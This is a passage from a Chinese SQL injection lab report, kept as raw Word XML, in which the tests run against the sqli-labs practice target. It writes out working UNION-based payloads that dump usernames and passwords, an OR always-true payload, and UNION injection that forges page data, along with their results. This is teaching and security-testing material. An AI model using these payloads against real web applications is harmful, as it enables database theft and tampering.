        <w:t>information_schema</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>是MySQL系统元数据库，存储所有数据库、数据表、字段的结构信息，是SQL注入脱库的核心依托。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A73A6CC">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="heading_26"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Step7：敏感数据批量脱取</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:p w14:paraId="5AA1769F">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>利用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>group_concat()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>函数将多行数据合并为单行回显，批量脱取核心敏感数据：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D97CD86">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1. 脱取用户账号密码：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>?id=-1' UNION SELECT 1,group_concat(username,0x3a,password),3 FROM users--+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2. 脱取隐藏Flag数据：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>?id=-1' UNION SELECT 1,group_concat(flag,0x3a,hint),3 FROM ctf_flag--+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E51096">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>其中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>0x3a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>为冒号十六进制编码，用于分隔字段数据，提升回显可读性。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43DA4DD3">
      <w:pPr>
        <w:spacing w:before="320" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="heading_27"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5 POC验证与结果分析</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27"/>
    </w:p>
    <w:p w14:paraId="15651FF9">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>本次实验编写4组标准化POC，覆盖UNION注入、OR永真注入、INSERT注入、批量拖库四大核心攻击场景，通过curl工具批量验证漏洞有效性，量化攻击效果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DAB6DC6">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="heading_28"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5.1 POC1：UNION自定义数据注入</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
    </w:p>
    <w:p w14:paraId="21873DA9">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>攻击场景</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>：搜索接口无过滤，可通过UNION查询插入自定义恶意数据，伪造页面信息。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>核心Payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>' UNION SELECT 1,'inj','inj@x.com','138'--</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>实验结果</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>：页面成功回显自定义用户数据，证明UNION联合查询注入完全生效，攻击者可伪造任意前台数据，存在钓鱼、页面篡改风险。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="323C6A0B">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="heading_29"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5.2 POC2：OR永真条件全量数据查询</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
    </w:p>
    <w:p w14:paraId="68C4BB53">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>攻击场景</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>：利用OR永真逻辑，绕过搜索条件限制，查询数据表全部数据。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>核心Payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>' OR '1'='1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>实验结果</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>：页面返回users表所有用户账号、邮箱、手机号数据，WHERE查询条件完全失效，存在严重数据泄露风险，也是万能密码登录的核心原理。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67DFED1C">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="30" w:name="heading_30"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5.3 POC3：INSERT注册接口注入</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>
    </w:p>
    <w:p w14:paraId="516A2337">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>攻击场景</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>：用户注册接口动态拼接INSERT语句，可通过恶意参数闭合SQL语句，绕过字段必填校验。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>实验结果</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>：攻击者通过构造用户名参数，自主定义密码、邮箱、手机号数据，绕过前端、后端双重校验，非法插入恶意用户数据，破坏业务数据完整性。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A5E85D8">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="31" w:name="heading_31"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5.4 POC4：UNION批量拖库注入</w:t>
      </w:r>
      <w:bookmarkEnd w:id="31"/>
    </w:p>
    <w:p w14:paraId="14221761">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>攻击场景</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>：通过UNION查询直接读取users表全量核心数据。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>实验结果</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>：成功批量获取所有用户账号、密码、隐私信息，可直接完成拖库攻击，漏洞危害等级为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>高危</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BCF8FA5">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="32" w:name="heading_32"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5.5 POC实验汇总结论</w:t>
      </w:r>
      <w:bookmarkEnd w:id="32"/>
    </w:p>
    <w:p w14:paraId="4295BEAE">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>本次4组POC均100%执行成功，证明目标Web系统存在全方位SQL注入漏洞，覆盖查询、注册、搜索多业务接口，可实现数据泄露、数据伪造、越权查询等多种攻击效果，必须立即修复。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B5DB6C">
      <w:pPr>
        <w:spacing w:before="320" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="33" w:name="heading_33"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>6 多场景SQL注入实战演练</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33"/>
    </w:p>
    <w:p w14:paraId="7F3081CF">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>基于sqli-labs靶场，全覆盖6类主流生产环境注入场景，适配真实Web业务漏洞特征。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="772142AA">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="34" w:name="heading_34"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>6.1 GET数字型注入（Less-2）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="34"/>
    </w:p>
    <w:p w14:paraId="245374D4">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>核心特征：参数无引号包裹，直接拼接数字参数，无需闭合引号即可注入。通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>id=2-1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>运算判定数字型，直接构造UNION查询完成脱库，是最简单的注入场景。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FDC4389">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="35" w:name="heading_35"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>6.2 GET字符型多闭合注入（Less-3/Less-4）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="35"/>
    </w:p>
    <w:p w14:paraId="77C0F45D">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>核心特征：参数被括号+引号包裹，分为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>")</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>闭合方式，只需适配对应闭合符即可篡改SQL语句，攻击逻辑与基础字符型注入一致。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E9E5C7">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="36" w:name="heading_36"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>6.3 搜索型LIKE模糊查询注入（Less-5）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="36"/>
    </w:p>
    <w:p w14:paraId="71705C9C">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>核心特征：SQL语句为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>LIKE '%$keyword%'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
